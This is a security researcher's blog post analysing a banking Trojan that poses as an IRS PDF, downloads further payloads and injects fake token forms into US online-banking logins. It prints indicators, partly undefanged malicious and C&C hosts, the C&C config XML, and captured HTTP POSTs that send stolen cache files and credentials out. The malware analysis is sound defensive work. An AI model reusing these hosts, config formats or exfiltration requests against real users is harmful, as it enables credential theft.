Banking Trojan Uses XML Based Config Files

While doing some work on my new project called AMaDa, I came across a banking Trojan which I’ve never seen before (what doesn’t mean that the Trojan itself has to be new).

The Trojan is being spread by at least two URLs which are most probably hijacked webservers:

URL: http://ihr-XXXXX.de/irs-pdf-f941.irs.com
Filename: irs-pdf-f941.irs.com
File size: 85504 bytes
MD5 : 9465ba350ecbc778b5d14e6f818d6715
SHA1: 484c869dc626db51450964c0089fff36447a3c86
VT tesult: 25 /42 (59.5%)

URL: hXXp://usa-XXXXX.org/download_pdf.html
Filename: download_pdf.com
File size: 44544 bytes
MD5: 32e4bedf5a196d3bbd707737b58eafd0
SHA1: 5660adb2720c3dfa64a184ec9ccc01767780abff
VT tesult: 31 /41 (75.6%)

For now I don’t know the infection vector. I assume that these urls have most probably been spammed out in juli and august 2010. It seems that the AV-Vendors currently don’t have any name for this kind of malware family. Most oft the AV-products just detected the files using some heuristic mechanism (Win32:Malware-gen, Heur.Packed.Unknown, Heur.Trojan.Generic, Generic Trojan etc…).

The reason why I pointed my attention to those malware samples is that both binaries are downloading a PDF file from the Internal Revenue Service (IRS) by opening a PDF file located at the website of the IRS:

The reason why the Trojan display this PDF file is simple: The victim expected a PDF file from the IRS when he opened the infection binary irs-pdf-f941.irs.com. Due to the fact that the Trojan displays a PDF from IRS, the victim will not recognize that he just got infected with a banking Trojan. A pretty nice idea from the cybercriminals….

Let’s take a deeper look into the behavior of the Trojan after a successful infection: First of all the Trojan drops another binary from a hijacked website in Poland:

GET http://www.psbprzedborz.pl/1.jpg
Filename: 1.jpg
File size : 680960 bytes
MD5: 0b88b5445e6597d2e0f04f0d143baafe
SHA1: af8ce9501c64ad8e559ac01c22a8e5575f3293f8
Result: 19 /42 (45.2%)

Afterwards the Trojan copy the downloaded file into the Windows-Directory (eg. on Windows XP):

C:\WINDOWS\inf\alg.exe

Now the Trojan drops another file from the same hijacked website:

GET http://www.psbprzedborz.pl/2.jpg
Filename: 2.jpg
File size : 790016 bytes
MD5: d79dba50310858b7ab875cc504955d6b
SHA1: d541f35489c5cb703217331ead99ec22597ee3fa
Result: 18 /42 (42.9%)

This time the Trojan puts the downloaded binary to the following file path:

C:\WINDOWS\inf\AcroIEHelper.dll

The Trojan downloads another two files from the following URLs:

GET http://www.psbprzedborz.pl/ChilkatCert_NT4.dll
Filename: ChilkatCert_NT4.dll
File size: 1187840 bytes
MD5: eaaab49836d94f98154608017615d798
SHA1: 8cdc4ee656262fc3465e209dccb9476a6f4c3072
Result: 15 /42 (35.7%)

GET http://www.psbprzedborz.pl/extract_cert.exe
Filename: extract_cert.exe
File size: 425984 bytes
MD5: b24cb5e2e96115eca60b4051fb0a8e68
SHA1: d9df321378027ece3935a646d86a45500b49fa59
Result: 13 /42 (31.0%)

And save it to the following file paths:

C:\WINDOWS\inf\ChilkatCert_NT4.dll
C:\WINDOWS\inf\extract_cert.exe

Those two file are obviously used to steal certificates from the Chilkat Software and from the windows cert manager. What next happens is… nothing. As long as the user of the infected computer doesn’t open the web browser (eg. Internet Explorer) the Trojan won’t communicated with the Command&Control Server. As soon as the victim open the web browser the Trojan begins to talk:

POST /ebb.php HTTP/1.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=——–081810192853104
Content-Length: 439
Host: 77.78.240.87
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

———-081810192853104
Content-Disposition: form-data; name=”cmd”
loadtok

———-081810192853104
Content-Disposition: form-data; name=”from”
ie-6.0.2900.5512

———-081810192853104
Content-Disposition: form-data; name=”v”
1.0.7

———-081810192853104
Content-Disposition: form-data; name=”UID”

[{Windows XP Professional Service Pack 3-COMPUTERNAME-USERNAME}]
———-081810192853104–

As shown above, the Trojan reports the version of the Trojan, the current status, the web browser version as well as the operating system to the C&C server 77.78.240.87, which is located in Bosnia:

IP address: 77.78.240.87
AS number: 42560
AS name: BA-GLOBALNET-AS GlobalNET Bosnia

This AS is a well known source of badness, so the server can be considered as Bulletproof Hosted:

Let’s go back to the Trojan: The reply which the C&C servers sends back to the infected client looks quite interesting. It’s a XML file containing the targets of the phishing attack:

HTTP/1.1 200 OK
Server: Apache/2
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<\?xml version="1.0" encoding="utf-8"?>

.
..commercial.XXXXX.com
..Password=
..http://77.78.240.87/tok/commercial.XXXX.com/token.htm
..http://77.78.240.87/tok/commercial.XXXXX.com/under_maintenance.htm
.

.
..chsec.XXXXX.com
..PASSWORD=
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/token.htm
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/under_maintenance.html
.

.
..secure.XXXXX.com
..userid=
..http://91.216.122.60/tok/net.XXXXX.com/token.htm
..http://91.216.122.60/tok/net.XXXXX.com/under_maintenance.htm
.

.
..treasury.XXXXX.com/portal/esec/login
..txtToken=
..http://77.78.240.87/tok/treasury.XXXXX.com/token.htm
..http://77.78.240.87/tok/treasury.XXXXX.com/under_maintenance.htm
.

.
..infoplus.XXXXX.com/
..pin=
..http://77.78.240.87/tok/infoplus.XXXXX.com/token.htm
..http://77.78.240.87/tok/infoplus.XXXXX.com/under_maintenance.htm
.

.
..businessonline.XXXXX.com
..TokenOTP=
..http://77.78.240.87/tok/businessonline.XXXXX.com/token.htm
..http://77.78.240.87/tok/businessonline.XXXXX.com/under_maintenance.htm
.

.
..wellsoffice.XXXXX.com/login/token_passcode
..token_code=
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/token2.htm
..http://77.78.240.87/tok/wellsoffice.XXXXX.com/under_maintenance.html
.

.
...XXXXX.com
..username=
..http://77.78.240.87/tok/direct.XXXXX.com/token.htm
..http://77.78.240.87/tok/direct.XXXXX.com/under_maintenance.htm
.

.
..singlepoint.XXXXX.com
..userid=
..http://77.78.240.87/tok/singlepoint.XXXXX.com/token.htm
..http://77.78.240.87/tok/singlepoint.XXXXX.com/under_maintenance.htm
.

.
..XXXXX.com
..auth_userId=
..http://77.78.240.87/tok/access.XXXXX.com/token.htm
..http://77.78.240.87/tok/access.XXXXX.com/under_maintenance.htm
.

.
..manufacturers.XXXXX.com..UserPass=
..http://77.78.240.87/tok/manufacturers.XXXXX.com/token.html
..http://77.78.240.87/tok/manufacturers.XXXXX.com/under-maintenance.html
.

.
..gateway.XXXXX.com
..tokenSerialNum=
..http://77.78.240.87/tok/gateway.XXXXX.com/token.html
..http://77.78.240.87/tok/gateway.XXXXX.com/under_maintenance.html
.

.
..treasurypro.XXXXX.com
..UNUSED_send_me_the_page=
..http://google.com
..http://google.com
.

[...]

I’ve censored the names of the banks which are being targeted by this Trojan. But I can say that it looks like as all of them are more or less well known banks in the US. To look what will happen, I’ve visited a login page of a online banking website which is being targeted above. I was pretty surprised as I saw that the Trojan just have stolen the temporary files from the browser cache aswell as the saved cookies:

Browser cache (sent to the C&C using HTTP POST):

———-081810192952792
Content-Disposition: form-data; name=”cmd”

upload.html
[....]
———-081810192952792
Content-Disposition: form-data; name=”file1″; filename=”C:\DOCUME~1\XXXX\LOCALS~1\Temp\aboutHtmlPagesblank\1064_1080\1.txt”
Content-Type: text/plain

<\!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<\html xmlns="http://www.w3.org/1999/xhtml" style="height: 100%">
<\head id="ctl00_Head1"><\title>Welcome to XXX Bank<\/title>
[...]

As soon as the victim enters his credentials for the online banking account, the Trojan will steal the credentials and send it to the C&C:

———-081810193250557
Content-Disposition: form-data; name=”data”

token_code=XXXXX&force_fake_token_field=22&Sign+On=Sign+On.token_code=XXXXX&force_fake_token_field=22&Sign On=Sign On&253D1&TYPE=XXXXX&COMPANY=XXXXX&WFUID=XXXXX&PASSWORD=XXXXX&Sign+On=Sign+On.REALM=XXXXX&DOMAIN=XXXXX&TARGET=

Due to the fact, that each security toke can only be used once, the Trojan will display a faked error message:

The faked error message tries to hide the fact that the entered credentials just in time gave been stoled by a banking Trojan

*** Conclusion ***
Summarized, the credentials are being stolen as follow:

  • Trojan gets a XML config file from the C&C server, defining the banks which the Trojan should target. The config file also contains a URL to a fake token form as well a URL where a fake error message is being displayed (after login)
  • As soon as the victim tries to log in into a online bank defined in the config, the Trojan will display a fake token form
  • After the victim entered his credentials, the Trojan will steal the credentials and display a fake error message

The technique being used by the Trojan isn’t pretty new. There are a few other Trojan families which are using the same method. I can only suggest all home users: Your online bank would never display a error message like “under maintenance due to blabla” after you logged into your account. Such error message will always be shown to you before you can enter the credentials to your online banking account!

4 Responses to “Banking Trojan Uses XML Based Config Files”


Leave a Reply




economics-recluse
Scene
Urgent!